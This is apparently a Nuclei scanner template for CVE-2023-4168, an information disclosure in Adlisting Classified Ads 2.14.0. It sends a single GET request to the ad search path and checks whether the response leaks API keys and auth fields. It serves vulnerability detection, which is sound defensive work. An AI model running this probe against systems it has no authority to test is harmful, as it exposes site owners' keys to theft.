44 lines
1.5 KiB
YAML
44 lines
1.5 KiB
YAML
id: CVE-2023-4168
|
|
|
|
info:
|
|
name: Adlisting Classified Ads 2.14.0 - Information Disclosure
|
|
author: r3Y3r53
|
|
severity: high
|
|
description: |
|
|
Information disclosure issue in the redirect responses, When accessing any page on the website, Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/51667
|
|
- https://templatecookie.com/demo/adlisting-classified-ads-script
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4168
|
|
- https://vuldb.com/?ctiid.236184
|
|
- https://vuldb.com/?id.236184
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-4168
|
|
cwe-id: CWE-200,NVD-CWE-noinfo
|
|
epss-score: 0.29305
|
|
epss-percentile: 0.96366
|
|
cpe: cpe:2.3:a:templatecookie:adlisting:2.14.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: templatecookie
|
|
product: adlisting
|
|
tags: cve,cve2023,adlisting,exposure
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword="
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains_all(body, "google_map_key", "api_key", "auth_domain")'
|
|
condition: and
|
|
|
|
# digest: 4b0a00483046022100af48757d08921049d1605dc8cbdc67b4aac36c0fa02e46e35e58467179852d13022100fedfd327637bf792cd080cd4a897849218a2d6088b9843197e0347fe636523f2:922c64590222798bb761d5b6d8e72950
|